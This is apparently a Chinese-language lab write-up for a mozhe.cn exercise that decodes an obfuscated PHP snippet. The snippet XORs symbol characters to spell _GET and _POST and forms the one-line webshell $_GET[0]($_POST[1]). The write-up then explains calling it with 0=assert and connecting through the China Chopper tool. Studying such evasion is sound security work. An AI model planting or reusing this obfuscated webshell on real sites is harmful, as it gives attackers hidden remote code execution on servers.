本文分析了一段复杂的PHP代码,揭示了如何通过特定构造获取Web应用中的敏感信息,并介绍了利用该原理部署一句话木马的方法。
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe
靶场显示一段PHP源码,经分析:
1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。
2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。
3、
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
("`"^"?") 01100000^00111111=01011111 —>”_”
(":"^"}") 00111010^01111101=01000111—>”G”
("%"^"`") 00100101^01100000=01000101—>”E”
("{"^"/") 01111011^ 00101111=01010100—>”T”
得到$__=_GET
4、
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
("$"^"{") 00100100^01111011=01011111—>”_”
("~"^".") 01111110^00101110=01010000—>”P”
("/"^"`") 00101111^01100000=01001111—>”O”
("-"^"~") 00101101^01111110=01010011—>”S”
("("^"|") 00101000^01111100=01010100—>”T”
得到$___=_POST
5、${$__}[!$_](${$___}[$_]);
得到$_GET[0]($_POST[1]);
6、构造一句话木马,将“0”当成参数,赋值为“assert”
7、使用菜刀工具连接,地址http://ip/b.php?0=assert 密码为1
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
